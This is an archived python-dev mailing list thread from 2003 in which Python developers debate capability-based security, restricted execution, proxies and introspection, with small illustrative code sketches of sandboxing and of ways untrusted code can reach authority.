But if you want to have an example of something like this for the record books, perhaps you could implement an iterator over a data structure, with the caveat that we'd like to implement the iterator and data structure in separate files (because sometimes the implementation of each could be large and complicated). I think it works like this: the data structure is one capability class; the iterator is another. The application asks the data structure to create an iterator. The data structure creates one and passes some subset of its internal state to the new object. It probably could not (and anyway should not) pass a pointer to the opaque closure that is its external representation. So instead it passes in whatever state variables the iterator is likely to be interested in.
If you did want to emulate class-based "friendship" (can't think of why, off the top of my head) you could do so like this:

def tellMeYourSecrets(myfriend):
    if isinstance(myfriend, MyFriendClass):
        return my_namespace()
    else:
        raise SecurityViolation, "Bug off"

The example in Stroustrup is where you want a vector class to be able to directly read the internals of a matrix class rather than go through inefficient method calls. But in a capabilities universe, even matrices can't, in general, see the internals of other matrices. I guess they'd have to use the trick above if that was really necessary.
If this technique became widespread, Python's restrictions on assigning to lexically inherited variables would probably become annoying.
The Namespace offers a possible workaround.
Yes, but why workaround rather than fix? Is there a deep reason Python objects can't write to intermediate namespaces? Is it just a little bit of extra safety against accidentally overwriting something? This is probably overkill in the case of intermediate scopes. And if not, there could be a keyword which is like global but for intermediate scopes.
... It would be cool if you could suggest little "security challenges" to work through. Given specific scenarios requiring things like mutability or friend classes, i think trying to implement them in this style could be very instructive.
Unfortunately, most of the examples I can come up with seem to be hacks, workarounds and optimizations. It isn't surprising that sometimes you lose some efficiency or simplicity when working in a secure system. It makes me wonder whether E might be less fun, efficient and productive than Python because security is embedded so deeply within it (just a speculation... I don't know E). A Python that could go back and forth between secure mode and insecure mode might be a nice compromise. Paul Prescod
On Sun, 30 Mar 2003, Paul Prescod wrote:
I'm not clear (because I've been following the thread with half my brain, over quite a few days) whether you are making or have made some specific proposal. I guess you are proposing a restricted mode that would make this example actually secure as opposed to almost secure. Are you also proposing any changes to the syntax?
Not yet. Although it's certainly tempting to propose syntax changes, it makes more sense to really understand what we want first. We can't know that until we've actually tried programming in the capability style in Python. That's why i want to explore the possibilities and try these exercises -- it will help us discover the shortest path from here to there.
Also, is restricted mode an interpreter mode or is it scoped by module?
Whether restricted mode is activated depends on the __builtins__ of the current namespace. So the short answer is "by module".
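The mechanics can be sketched with exec and a hand-built builtins namespace. (Caveat: in today's CPython this only controls which names are *visible* to the executed code; the interpreter-enforced restricted mode under discussion here did more than that.)

```python
# Only these names are visible as builtins to the executed code.
safe_builtins = {"len": len, "range": range}

namespace = {"__builtins__": safe_builtins}
exec("result = len(range(5))", namespace)

# Anything left out of safe_builtins simply doesn't exist in there:
try:
    exec("f = open('somefile')", {"__builtins__": safe_builtins})
    open_visible = True
except NameError:
    open_visible = False
```

Because each module has its own globals (and hence its own `__builtins__`), this is naturally scoped per module.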
Yes, but why workaround rather than fix? Is there a deep reason Python objects can't write to intermediate namespaces?
No. There's just no syntax for it yet. But let's figure out what we can get away with first.
It would be cool if you could suggest little "security challenges" to work through. Given specific scenarios requiring things like mutability or friend classes, i think trying to implement them in this style could be very instructive.
Unfortunately, most of the examples I can come up with seem to be hacks, workarounds and optimizations. It isn't surprising that sometimes you lose some efficiency or simplicity when working in a secure system.
Hmm, i'm not sure you understood what i meant. The code example i posted is a solution to the design challenge: "provide read-only access to a directory and its subdirectories, but no access to the rest of the filesystem". I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier. -- ?!ng
Ka-Ping Yee wrote:
Hmm, i'm not sure you understood what i meant. The code example i posted is a solution to the design challenge: "provide read-only access to a directory and its subdirectories, but no access to the rest of the filesystem". I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier.
Okay, how about allowing a piece of untrusted code to import modules from a selected subset of all modules. For instance, you probably want to allow untrusted code to get access to regular expressions and codecs (after taming!) but not os or socket.

Speaking of sockets, web browsers often allow connections to sockets only at a particular domain. In a capabilities world, I guess the domain would be an object that you could request sockets from.

Are DOS issues in scope? How do we prevent untrusted code from just bringing the interpreter to a halt? A smart enough attacker could even block all threads in the current process by finding a task that is usually not time-sliced and making it go on for a very long time. Without looking at the Python implementation, I can't remember an example off the top of my head, but perhaps a large multiplication or search-and-replace in a string.

Paul Prescod
Paul Prescod wrote:
Are DOS issues in scope? How do we prevent untrusted code from just bringing the interpreter to a halt? A smart enough attacker could even block all threads in the current process by finding a task that is usually not time-sliced and making it go on for a very long time. Without looking at the Python implementation, I can't remember an example off the top of my head, but perhaps a large multiplication or search-and-replace in a string.
It seems to me that this is an issue orthogonal to capabilities (though access to mechanisms that regulate it might well be capability-based). Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
On Mon, Mar 31, 2003, Ka-Ping Yee wrote:
I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier.
Okay, how about using LDAP to secure access to a database and give each user appropriate privileges? I'm just throwing this in as an example of mediated access that's required to be effective in the Real World [tm]; I'm sure you can think of simpler examples if you want. -- Aahz (aahz@pythoncraft.com) <*> http://www.pythoncraft.com/ This is Python. We don't care much about theory, except where it intersects with useful practice. --Aahz, c.l.py, 2/4/2002
Ka-Ping Yee wrote:
Hmm, i'm not sure you understood what i meant. The code example i posted is a solution to the design challenge: "provide read-only access to a directory and its subdirectories, but no access to the rest of the filesystem". I'm looking for other security design challenges to tackle in Python. Once enough of them have been tried, we'll have a better understanding of what Python would need to do to make secure programming easier.
Well, one of the favourites is to create a file selection dialog that will only give access (optionally readonly) to the file designated by the user. This may be rather more than you want to bite off as a working system at this stage, though! It might be a useful thought experiment, though. Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda. Guido's paragraph, above, seems to assume that it is. In fact, the pattern he described is a common and powerful way of using capabilities.

A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.

It seems to me that the "rexec vs. proxy" debate is really about a very different question: how do we get from Python's currently promiscuous objects to properly restricted objects? (Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)

If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure". I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.

The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default. Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys).
For example,

class Foo:
    pass

print Foo.__dict__              # fails

from sys import introspect
print introspect(Foo).__dict__  # succeeds

When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away). This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.

-- ?!ng
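Coming back to Guido's registry example upthread: interposing a read-only subset is itself the capability pattern. A minimal sketch (all names hypothetical):

```python
def readonly_view(mapping):
    """Expose only the reading half of a dict-like registry; holding
    the returned object *is* the read capability."""
    class ReadOnlyRegistry:
        def __getitem__(self, key):
            return mapping[key]
        def get(self, key, default=None):
            return mapping.get(key, default)
        def keys(self):
            return list(mapping.keys())
    return ReadOnlyRegistry()

registry = {"host": "localhost", "port": 8080}
view = readonly_view(registry)
```

The view has no `__setitem__` at all, so write access simply isn't in its vocabulary -- though, as the thread keeps noting, real security would also have to block introspection routes back to the underlying mapping.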
Ka-Ping Yee wrote:
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
I'm pretty sure that Guido meant to say "bound method" rather than "capability" in the text above. I think that the debate is partly whether to express capabilities (or some other scheme) in terms of bound methods or proxies, which expose entire interfaces.
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
There are a bunch of confusions floating around. :) A major one is the lack of a concise definition of what a capability is, and why the capability approach is good or bad. There's good reading about capabilities in E, http://www.erights.org/; I really need to read all that stuff again. Of course, as others pointed out, I ended up creating something for Zope 3 that isn't capabilities. I think you touch on a reason below.
Guido's paragraph, above, seems to believe that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.
It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects?
(Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)
If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure".
I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default. Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example,
class Foo: pass
print Foo.__dict__ # fails
from sys import introspect
print introspect(Foo).__dict__  # succeeds
When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away).
This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.
You seem to be arguing that programmers should not have to explicitly create capabilities, but that everything should be a capability by default. Please correct me if I'm wrong.

I thought that the main point of capabilities was that programmers *should* explicitly bother to pass capabilities. Programmers should think about arguments passed to (or returned or raised to) other code as capabilities to do things, and pass *just* the capabilities needed. I find a lot of appeal in this idea.

Zope employs proxies in a way that falls somewhere between the extremes of capabilities and implicitly protecting everything. (I'm going to be a little sloppy here for brevity. A Zope proxy is made up of two objects: a simple proxy that *could* be used to implement capabilities, and a checker that provides policy. The policy we currently use in Zope is not a capability policy.)

Zope security proxies assure that "everything" is proxied. (We choose not to proxy simple values like numbers, strings, and None.) Values returned from operations on proxies are themselves proxied. This makes it pretty straightforward to set up execution environments where untrusted code only has access to proxies. In addition, if untrusted code calls trusted code, the untrusted code can only pass proxies. This means that trusted code can't be tricked into performing operations that the untrusted code could not perform.

Zope proxies achieve this level of automation by providing registries, mostly based on classes, that allow programmers to say how different kinds of objects should be proxied. Programmers decide what capabilities to expose at "compile" time (really program startup) rather than run time. Programmers *can* create proxies explicitly that provide non-default access. In fact, there are APIs that actually provide the equivalent of capabilities.

I mention all of this because I think it's worth thinking/debating this issue about how explicit security should be.
On the one hand, explicitly giving *just* the capabilities needed for a task seems very appealing. OTOH, making sure that everything is protected by default is safer. I suspect that there are ways to combine (trade off?) these in reasonable ways. Jim -- Jim Fulton mailto:jim@zope.com Python Powered! CTO (888) 344-4332 http://www.python.org Zope Corporation http://www.zope.com http://www.zope.org
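The proxy/checker split Jim describes might be sketched like this (a toy, not Zope's actual code; the real zope.security proxy also proxies values returned through it, which this sketch omits):

```python
class Checker:
    """Policy object: which attribute names may cross the proxy."""
    def __init__(self, allowed):
        self.allowed = set(allowed)
    def check(self, name):
        if name not in self.allowed:
            raise AttributeError("access to %r denied by checker" % name)

class Proxy:
    """Mechanism object: forwards attribute access, consulting the checker.
    (Toy version -- the wrapped object is still reachable as _target,
    which a real proxy would of course prevent.)"""
    def __init__(self, target, checker):
        self._target = target
        self._checker = checker
    def __getattr__(self, name):
        # Called only for names not found on the Proxy itself.
        self._checker.check(name)
        return getattr(self._target, name)

registry = {"db": "postgres"}
read_only = Checker(["get", "keys", "items"])
proxy = Proxy(registry, read_only)

try:
    proxy.pop            # not on the allowed list
    pop_allowed = True
except AttributeError:
    pop_allowed = False
```

Note how the same Proxy mechanism can serve either discipline: give the Checker a caller-independent method list and you have something capability-like; plug in a richer policy and you have Zope's model.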
Ka-Ping Yee wrote:
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
Guido's paragraph, above, seems to believe that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.
I think this is an implementation detail, as I have mentioned before. A capability is a thing with certain properties, as discussed ad nauseam. You can implement them using bound methods or using opaque objects. Personally, I'd like to do both, but if I had to choose, I'd use bound methods. Yes, this probably is a shift in position - I'm still trying to figure this stuff out, is my excuse! Cheers, Ben. -- http://www.apache-ssl.org/ben.html http://www.thebunker.net/ "There is no limit to what a man can do or how far he can go if he doesn't mind who gets the credit." - Robert Woodruff
Ben Laurie wrote:
BTW, if you would like to explain why you don't think bound methods are the way to go on python-dev, I'd love to hear it.
Guido van Rossum wrote:
Using capabilities, I would have to hand her a bunch of capabilities for various methods: __getitem__, has_key, get, keys, items, values, and many more. Using proxies I can simply give her a read-only proxy for the object. So proxies are more powerful.
(Jim surmised that I meant to write "bound methods". Alas, I don't get off that easily: at the time I wrote that I really did think that a capability had to be a single function.) [Ping]
There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
I guess I misunderstood... I was sure that Ben told me this was so. Apparently I misread, or you have a different definition of capability than he does (wouldn't be the first time).
Guido's paragraph, above, seems to assume that it is. In fact, the pattern he described is a common and powerful way of using capabilities. A capability is just an unforgeable object reference. In a pure capability system, the only thing you can do with a capability is to call methods on it (or, if you prefer, all you can do is send messages to it). Interposing an object to expose only a subset of another object's API, such as a read-only subset, is exactly the power capabilities give you.
So a proxy with a fixed (not depending on the caller) policy about which methods you can call should be considered equivalent to a capability -- in fact this would be a way to implement capabilities.
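Guido's read-only registry proxy with a fixed policy can be sketched in a few lines. This is only the shape of the idea, with invented names: Python's name mangling is not a security barrier, and indexing syntax like facet[k] bypasses __getattr__ (dunder lookup happens on the type), so a real implementation would need to mediate those paths too.

```python
class ReadOnlyFacet:
    """Sketch: expose a fixed, caller-independent read-only subset
    of a mapping's API.  Not a hardened design."""

    _allowed = frozenset(["get", "keys", "items", "values", "__contains__"])

    def __init__(self, target):
        self._target = target   # reachable by determined code; sketch only

    def __getattr__(self, name):
        # Only invoked when normal lookup fails, i.e. for methods we
        # deliberately did not define on the facet itself.
        if name in self._allowed:
            return getattr(self._target, name)
        raise AttributeError("not part of the read-only facet: " + name)

facet = ReadOnlyFacet({"host": "localhost"})
print(facet.get("host"))    # allowed: read access
# facet.pop / facet.__setitem__ raise AttributeError: no write access
```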
It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects?
(Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)
If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure".
Well, actually, restricted execution as currently implemented does *not* strive to make all objects secure: untrusted code can still inspect all attributes of an object unless that object is proxied by a Bastion, or unless that object is one of a few built-in types (e.g. bound methods) for which some attributes are privatized.
I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.
But we don't have the latter.
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default.
That wouldn't be Python.
Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example,
class Foo: pass
print Foo.__dict__ # fails
from sys import introspect
print introspect(Foo).__dict__ # succeeds
When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away).
This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.
That flag wasn't my idea, it was someone else's (Greg Ewing?). --Guido van Rossum (home page: http://www.python.org/~guido/)
Guido:
That flag wasn't my idea, it was some one else's (Greg Ewing?).
Yes, it was my idea. I was thinking that there was already a word of flags in the object struct that might have some room left, but I may have been thinking of type objects.

I'm not sure it's such a good idea now anyway. As has been pointed out, you'd still need proxies of some kind to restrict interfaces. It would just mean you'd be able to build your proxy out of any suitable type of object. The other idea was that trusted code would be able to set the flag on all the objects that it passed to untrusted code, instead of having to proxy them all. But, as has also been pointed out, that's a rather brittle way to enforce security.

I think I agree that to really get on top of this security business we need to move towards having dangerous things forbidden by default rather than allowed by default. To that end, it would be useful if we could pin down exactly what's dangerous and what isn't. It seems to me that most uses of introspection by most programs are harmless. Can we sort out those (hopefully few) things that are dangerous, and separate them from the existing introspection mechanisms?

Access to sys.modules has been mentioned as a key thing that needs to be restricted. Maybe this shouldn't be an arbitrarily-accessible variable? Maybe the sys module shouldn't be a module at all, but some special object that won't let you do nasty things with its contents unless you've got special privileges (which most code would *not* have by default). One of the "nasty" things would be picking the real __builtins__ out of sys.modules. Are there any others?

Greg Ewing, Computer Science Dept, University of Canterbury,
Christchurch, New Zealand    greg@cosc.canterbury.ac.nz
"A citizen of NewZealandCorp, a wholly-owned subsidiary of USA Inc."
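Greg's "sys shouldn't be a module but a special guarded object" idea can be sketched as a namespace that withholds dangerous entries unless the caller presents a privilege token. Every name here is invented; this shows the shape of the idea, not a hardened design (in particular, real sandboxing would also have to keep the token itself unreachable).

```python
class GuardedNamespace:
    """Sketch of a sys-like object: public entries are freely readable,
    privileged ones require a token that trusted code holds."""

    def __init__(self, public, privileged, token):
        self._public = dict(public)
        self._privileged = dict(privileged)
        self._token = token

    def lookup(self, name, token=None):
        if name in self._public:
            return self._public[name]
        if token is self._token and name in self._privileged:
            return self._privileged[name]
        raise PermissionError("no access to %r" % name)

token = object()   # unforgeable by identity; held only by trusted code
safe_sys = GuardedNamespace({"version": "2.3"}, {"modules": {}}, token)

print(safe_sys.lookup("version"))        # fine for anyone
# safe_sys.lookup("modules")             # PermissionError without the token
```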
[Greg Ewing]
I think I agree that to really get on top of this security business we need to move towards having dangerous things forbidden by default rather than allowed by default.
This is more or less what the rexec module implements, except for convenience it has a list of unsafe built-ins rather than a list of safe built-ins.
To that end, it would be useful if we could pin down exactly what's dangerous and what isn't. It seems to me that most uses of introspection by most programs are harmless. Can we sort out those (hopefully few) things that are dangerous, and separate them from the existing introspection mechanisms?
Maybe, maybe not. The original restricted execution code (not the rexec module) arbitrarily decided that setting class attributes was dangerous but getting them was not. Samuele found that new-style classes allow both, but always disallow write-access to the class __dict__ (you have to use the setattr protocol); this is good or bad depending on how it's used. The real problem is that harmful access may be granted via innocent-looking access. For example, allowing read-only access to a function's globals gives you access to the unrestricted 'open' function...
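Guido's point about innocent-looking access is still demonstrable today (func_globals has since been renamed __globals__): merely being allowed to *read* a function object's attributes reaches its module globals, and from there the unrestricted built-ins.

```python
def innocent():
    """A harmless-looking function handed to untrusted code."""
    return 42

# Read access to the function object reaches its module globals...
g = innocent.__globals__            # spelled func_globals in 2003-era Python

# ...and the globals reach the unrestricted built-ins, including open().
b = g["__builtins__"]
builtins_ns = b if isinstance(b, dict) else vars(b)   # module or dict
leaked_open = builtins_ns["open"]   # full filesystem authority, leaked
```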
Access to sys.modules has been mentioned as a key thing that needs to be restricted. Maybe this shouldn't be an arbitrarily-accessible variable? Maybe the sys module shouldn't be a module at all, but some special object that won't let you do nasty things with its contents unless you've got special privileges (which most code would *not* have by default).
That's pretty much what the rexec module implements; it overrides __import__ and when you ask for sys, you get a fake sys that only contains stuff that should be safe.
One of the "nasty" things would be picking the real __builtins__ out of sys.modules. Are there any others?
Picking an unsafe extension module out of sys.modules. --Guido van Rossum (home page: http://www.python.org/~guido/)
From: "Guido van Rossum" <guido@python.org>
[Greg Ewing]
I think I agree that to really get on top of this security business we need to move towards having dangerous things forbidden by default rather than allowed by default.
This is more or less what the rexec module implements, except for convenience it has a list of unsafe built-ins rather than a list of safe built-ins.
To that end, it would be useful if we could pin down exactly what's dangerous and what isn't. It seems to me that most uses of introspection by most programs are harmless. Can we sort out those (hopefully few) things that are dangerous, and separate them from the existing introspection mechanisms?
Maybe, maybe not. The original restricted execution code (not the rexec module) arbitrarily decided that setting class attributes was dangerous but getting them was not. Samuele found that new-style classes allow both, but always disallow write-access to the class __dict__ (you have to use the setattr protocol); this is good or bad depending on how it's used.
but given that methods can be overridden per instance with classic classes:

    class C:
        def f(s): ...

    c = C()
    c.f = lambda s: s

it was not so effective.
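The same shadowing Samuele describes still works for plain functions stored on an instance (in today's terms, functions are non-data descriptors, so the instance dict wins on lookup), which is why guarding only the class is not enough:

```python
class C:
    def f(self):
        return "from the class"

c = C()
# Per-instance override: an attribute set on the instance shadows the
# class-level method.  Note the instance attribute is a plain function,
# so it is called without a self argument.
c.f = lambda: "from the instance"

print(c.f())     # -> "from the instance"
print(C().f())   # -> "from the class" (other instances are unaffected)
```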
The real problem is that harmful access may be granted via innocent-looking access. For example, allowing read-only access to a function's globals gives you access to the unrestricted 'open' function...
restricted execution alone, for example, does not have a notion of subclassable vs. non-subclassable classes, and given its approach, subclassing can be dangerous. For sure a good thing would be for the func_* and im_* attributes of functions and methods to be substituted by special accessor functions/objects, independently of restricted mode. Functions and methods should be basically opaque to normal code.
From: "Samuele Pedroni" <pedronis@bluewin.ch>
For sure a good thing would be for the func_* and im_* attributes of functions and methods to be substituted by special accessor functions/objects, independently of restricted mode.
to clarify: I mean something like

    func_globals(f)

vs.

    f.func_globals

regards
Guido van Rossum wrote:
Ben Laurie wrote: There seems to be a persistent confusion here that i would like to dispel: a capability is not a single lambda.
I guess I misunderstood... I was sure that Ben told me this was so. Apparently I misread, or you have a different definition of capability than he does (wouldn't be the first time).
The thing is that a capability is a pretty abstract notion. You can implement them as classes or as lambdas - I initially did them as classes, but decided that lambdas were neater, at least in the context of Python. I could be wrong. It could just be my particular bias, which is why I'd prefer, ideally, to be able to do either.

I'm sure if people want to be definition lawyers they can find documentation explaining why either of those isn't quite right, but I'm interested in functionality and the functionality is available either way.

Cheers, Ben.
On Mon, 2003-03-10 at 05:51, Ka-Ping Yee wrote:
It seems to me that the "rexec vs. proxy" debate is really about a very different question: How do we get from Python's currently promiscuous objects to properly restricted objects?
I think that's the right question.
(Once we have properly restricted objects in either fashion, yes, definitely, using proxies to restrict access is a great technique.)
If i understand correctly, the "proxy" answer is "we create a special wrapper object, then the programmer has to individually wrap any object they want to be secure". And the "rexec" answer is "we create an interpreter mode in which all objects are secure".
The proxy answer is a bit more complex. Any object returned from a proxy is itself wrapped in a proxy, except for immutable objects like None, ints, and strings. The initial proxy creates a barrier between the code that created the proxy and the client that uses the proxy.
I think the latter is far better. To have any sort of real chance at establishing security, you have to start from a place where everything is secure, instead of starting from a place where everything is insecure and you have to individually secure every single object with its own wrapper.
It would indeed be impractical to wrap every object manually. I think both approaches tend towards the design principle of fail-safe defaults and complete mediation. A proxy mediates all access to the object it wraps. By default, it allows no access. When it allows access, it creates new proxies that provide the same facilities as the original. The one exception is for immutable objects. (Immutability is good for so many reasons.)
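Jeremy's description of recursive wrapping with an immutable pass-through can be sketched as follows. The API is invented; a real proxy would also have to mediate attribute access, the dunder protocols, and mutables hiding inside "immutable" containers like tuples (deliberately excluded from the pass-through list here for that reason).

```python
IMMUTABLE = (bool, int, float, complex, str, bytes, frozenset, type(None))

class Proxy:
    """Sketch: results of permitted calls are re-wrapped in a new Proxy,
    so the barrier follows the object graph; immutables cross as-is."""

    def __init__(self, target, allowed):
        self._target = target
        self._allowed = frozenset(allowed)

    def call(self, name, *args):
        if name not in self._allowed:            # complete mediation
            raise PermissionError(name)
        result = getattr(self._target, name)(*args)
        if isinstance(result, IMMUTABLE):
            return result                        # fail-safe pass-through
        return Proxy(result, self._allowed)      # mutables stay wrapped

p = Proxy({"a": [1, 2]}, ["get"])
wrapped = p.call("get", "a")     # the list comes back behind a new Proxy
q = Proxy({"n": 1}, ["get"])
print(q.call("get", "n"))        # an int crosses the barrier unwrapped
```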
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default. Anyone wanting to do introspection would simply have to obtain the "introspect" capability from a privileged place (e.g. sys). For example,
class Foo: pass
print Foo.__dict__ # fails
from sys import introspect
print introspect(Foo).__dict__ # succeeds
When running the interpreter in secure mode, "introspect" would just be missing from the sys module (again, ideally sys.introspect wouldn't exist by default, and a command-line option would turn it on, but i realize that's far away).
This would have the effect of the "introspectable flag" that Guido mentioned, but without expending any storage at all, until you actually needed to introspect something.
If Python's introspection were less ad hoc, I suppose this issue would be easier to tackle. (Has anyone done security design for a CLOS-style meta-object protocol?)

Note that the biggest problem with the introspectable flag is that it would need to be checked all over the interpreter internals. For example, the interpreter optimizes bound method calls by extracting the im_self and im_func and calling im_func directly, passing im_self and the rest of the arguments. This is all done within the mainloop using a single type check and a bunch of macros to extract fields from the bound method. It is pretty common to use macros that depend on the representation of builtin types like functions, methods, dictionaries, etc.

Jeremy
Ka-Ping Yee <ping@zesty.ca>:
The eventual ideal is to have a system where all objects are "pure" objects (i.e. non-introspectable capabilities) by default.
Perhaps it would be useful to distinguish between what might be called "read-only" introspection, and more powerful forms of introspection. Usually it doesn't do any harm to be able to find out things like what class an object belongs to and what methods it supports, so perhaps these kinds of introspections don't need to be restricted by default. But more intrusive things like reading/writing arbitrary attributes or calling arbitrary methods would require special permission.

Greg Ewing
On Tue, 11 Mar 2003, Greg Ewing wrote:
Perhaps it would be useful to distinguish between what might be called "read-only" introspection, and more powerful forms of introspection.
Usually it doesn't do any harm to be able to find out things like what class an object belongs to and what methods it supports, so perhaps these kinds of introspections don't need to be restricted by default.
A serious flaw with this particular point is that Python does not separate the identity of a class from the power to create instances of that class. Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments. -- ?!ng
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered? --Guido van Rossum (home page: http://www.python.org/~guido/)
On Sun, 30 Mar 2003, Guido van Rossum wrote:
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered?
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.

To pick one at random, consider zipfile.ZipFile. At first glance it appears that once you create a ZipFile object with mode "r" you can hand it off to provide read-only access to a zip archive. (Even if a security audit of the code reveals holes, my point is that the API isn't far from accommodating such a design intent.) It's useful to be able to separate the authority to read one particular instance of ZipFile from the authority to instantiate new ZipFiles, which currently allows you to open any zip file on the filesystem for reading or writing.

-- ?!ng
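Ping's ZipFile example is easy to reproduce: the instance you meant to hand out as a read-only grant leaks its class via type(), and the class is a full constructor with ambient filesystem authority. (The archive here is built in memory so the sketch is self-contained.)

```python
import io
import zipfile

# Build a small archive in memory so the example touches no real files.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as zf:
    zf.writestr("a.txt", "hello")

# The grant: a ZipFile opened read-only over that one archive.
reader = zipfile.ZipFile(io.BytesIO(buf.getvalue()), "r")
print(reader.read("a.txt"))          # intended read-only use

# The leak: the instance gives back its class, and the class can open
# any path on the filesystem, for reading or writing.
recovered = type(reader)
assert recovered is zipfile.ZipFile
# recovered("/any/path/archive.zip", "w")   # nothing stops this call
```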
Ka-Ping Yee wrote:
... In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.
Just out of curiosity, wouldn't you say that part of the capability zen is that capabilities that allow you to turn global strings into objects should either not exist or be very segmented from other capabilities? (In fact I remember discussing this with you at some Python conference!) In CapDesk, I believe you drag a capability for a file from one window to another, so that the "drop target" never needs to know or care what the filename was.

So it might be better to separate the authority from the __init__ than to separate constructors from classes. Arguably it is better to add to the library than to change the language:

    return securefile("foo.txt").reader()

    x = zipfile.ZipFile(securefile("foo.txt").reader())

Paul Prescod
[Ping]
Having access to a particular instance should certainly not allow one to ask it for its class, and then instantiate the class with arbitrary constructor arguments.
[Guido]
Assuming the Python code in the class itself is not empowered in any special way, I don't see why not. So that suggests that you assume classes can be empowered. I can see this for classes implemented in C; but how can classes implemented in pure Python be empowered?
[Ping]
In many classes, __init__ exercises authority. An obvious C type with the same problem is the "file" type (being able to ask a file object for its type gets you the ability to open any file on the filesystem). But many Python classes are in the same position -- they acquire authority upon initialization.
